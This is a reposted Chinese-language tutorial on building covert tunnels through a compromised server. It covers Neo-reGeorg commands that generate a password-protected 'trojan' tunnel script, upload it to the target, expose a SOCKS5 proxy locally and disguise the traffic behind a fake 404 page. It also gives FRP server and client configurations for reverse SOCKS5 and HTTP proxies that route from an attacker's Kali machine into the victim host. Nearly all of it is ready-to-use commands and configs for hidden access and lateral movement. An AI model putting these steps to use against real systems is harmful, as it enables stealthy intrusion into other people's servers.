NEO-regeorg隱蔽隧道搭建
由python寫的一個http代理工具
基本使用
1.設定一個連接密碼
python .\neoreg.py generate -k 連接密碼 -o 指定輸出目錄
例如
python .\neoreg.py generate -k passwd
2.再將生成出來的木馬檔案上傳到目標服務器上
3.連接目標 腳本會自動生成一個sockets5的代理映射在本地的1080埠以上供我們使用,
使用sockets5:127.0.0.1:1080即可
python .\neoreg.py -k passwd -u 目標地址 例如 python .\neoreg.py -k passwd -u http://www.tst.com/tunnel.php
#連接的時候發現error 可以使用--skip進行略過開啟
python .\neoreg.py -k pass -u http://www.test.com/tunnel.php --skip
關鍵是有沒有包含requests包
pip3 install requests
4.一般來說都是通過200的頁面去鏈接,neoreg可以偽造404頁面進行連接
python .\neoreg.py -k passwd --file 404.html --httpcode 404 -o test2
FRP隧道連接
https://github.com/fatedier/frp/releases
1.socks5反向代理
配置服務端
[common]
bind_addr=0.0.0.0
bind_port=1234
[socks5]
type=tcp
remote_port=1080
plugin=socks5
配置客戶端
[common]
server_addr=kali's ip
server_port=1234
[socks5]
type=tcp
remote_port=1080
plugin=socks5
proxychains添加socks5代理
2.HTTP的反向代理
配置服務端,將frps以及frps.ini上傳到攻擊機如下 [common] bind_addr=0.0.0.0 #frp配置監聽ip bind_port=1234 #frp配置監聽埠 [http_proxy] type=tcp remote_port=1080 #http代理埠 plugin=http_proxy #使用http代理
配置客戶端,將frpc和frpc.ini上傳到靶機
[common]
server_addr=kali's ip
server_port=1234
[http_proxy]
type=tcp
remote_port=1080
plugin=http_proxy
#利用
frps -c frps.ini
frpc -c frpc.ini
#再添加http代理埠1080
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/550153.html
標籤:其他
上一篇:故障注入的方法與工具
下一篇:數學建模論文排版
